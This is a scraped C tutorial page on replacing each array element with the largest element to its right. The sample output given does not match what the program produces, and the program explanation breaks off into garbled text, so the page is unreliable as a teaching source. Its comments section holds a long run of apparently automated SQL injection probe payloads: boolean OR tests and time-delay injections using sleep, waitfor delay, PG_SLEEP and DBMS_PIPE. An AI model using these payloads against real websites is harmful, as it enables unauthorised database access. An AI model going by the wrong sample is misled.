C Program to replace every element with the greatest element on right side
Get array size n and n elements of array, replace every elements with the greatest element located in right side.
Sample Input 1:
5 5 7 9 3 1
Sample Output 1:
9 9 3 3 1
Program or Solution
#include<stdio.h>
#include<stdlib.h>
int main()
{
int *a,n,i,j,max;
printf("Enter size of array:");
scanf("%d",&n);
a=malloc(sizeof(int)*n);
printf("Enter %d Elements:",n);
for(i=0;i<n;i++)
{
scanf("%d",&a[i]);
}
for(i=0;i<n-1;i++)
{
max=a[i+1];
for(j=i+2;j<n;j++)
{
if(a[j]>max)
{
max=a[j];
}
}
a[i]=max;
}
printf("Output:\n");
for(i=0;i<n;i++)
{
printf("%d ",a[i]);
}
return 0;
}
Program Explanation
visit each location in array find the greatest element (max)next to the location using for(j=i+2;jComments
ubaTaeCJ
-1 OR 2+30-30-1=0+0+0+1 --ubaTaeCJ
-1 OR 3+30-30-1=0+0+0+1 --ubaTaeCJ
-1 OR 3*2<(0+5+30-30) --ubaTaeCJ
-1 OR 3*2>(0+5+30-30) --ubaTaeCJ
-1 OR 2+297-297-1=0+0+0+1ubaTaeCJ
-1 OR 3+297-297-1=0+0+0+1ubaTaeCJ
-1 OR 3*2<(0+5+297-297)ubaTaeCJ
-1 OR 3*2>(0+5+297-297)ubaTaeCJ
-1' OR 2+766-766-1=0+0+0+1 --ubaTaeCJ
-1' OR 3+766-766-1=0+0+0+1 --ubaTaeCJ
-1' OR 3*2<(0+5+766-766) --ubaTaeCJ
-1' OR 3*2>(0+5+766-766) --ubaTaeCJ
-1' OR 2+620-620-1=0+0+0+1 or '8TRBD3MF'='ubaTaeCJ
-1' OR 3+620-620-1=0+0+0+1 or '8TRBD3MF'='ubaTaeCJ
-1' OR 3*2<(0+5+620-620) or '8TRBD3MF'='ubaTaeCJ
-1' OR 3*2>(0+5+620-620) or '8TRBD3MF'='ubaTaeCJ
-1" OR 2+469-469-1=0+0+0+1 --ubaTaeCJ
-1" OR 3+469-469-1=0+0+0+1 --ubaTaeCJ
-1" OR 3*2<(0+5+469-469) --ubaTaeCJ
-1" OR 3*2>(0+5+469-469) --ubaTaeCJ
if(now()=sysdate(),sleep(15),0)ubaTaeCJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'ZubaTaeCJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"ZubaTaeCJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ubaTaeCJ
-1; waitfor delay '0:0:15' --ubaTaeCJ
-1); waitfor delay '0:0:15' --ubaTaeCJ
1 waitfor delay '0:0:15' --ubaTaeCJ
ZcPOums8'; waitfor delay '0:0:15' --ubaTaeCJ
-5 OR 81=(SELECT 81 FROM PG_SLEEP(15))--ubaTaeCJ
-5) OR 978=(SELECT 978 FROM PG_SLEEP(15))--ubaTaeCJ
-1)) OR 510=(SELECT 510 FROM PG_SLEEP(15))--ubaTaeCJ
igqhdHY3' OR 143=(SELECT 143 FROM PG_SLEEP(15))--ubaTaeCJ
jep2TZfZ') OR 841=(SELECT 841 FROM PG_SLEEP(6))--ubaTaeCJ
Oj8svhX8')) OR 403=(SELECT 403 FROM PG_SLEEP(6))--ubaTaeCJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),3)ubaTaeCJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'ubaTaeCJ
1'"ubaTaeCJ
@@86UDxRelated Programs
- C Program to get and print the array elements
- C Program to find the sum of array elements
- C Program to find the sum and average of array Elements
- C Program to Search an Element in an array
- C Program to find Largest element in the array
- C Program to find Smallest element in the array
- C Program to print all the numbers which are less than given key element from a given array.
- C Program to find Second Largest element in the array
- C Program to find Second smallest element in the array
- C Program to delete an element in an array
- C Program to Reverse the Elements in array
- C Program to reverse the first half of array elements
- C Program to reverse the second half of array elements
- C Program to Sort the Elements in ascending order
- C Program to Sort the Elements in descending order
- C Program to sort half of the Array elements in ascending order and next half in descending order
- C Program to Merging two arrays
- C Program to perform circular Array Rotation
- C Program to add two matrix
- C Program to multiply two matrix
- C Program to transpose the Matrix
coming Soon
coming Soon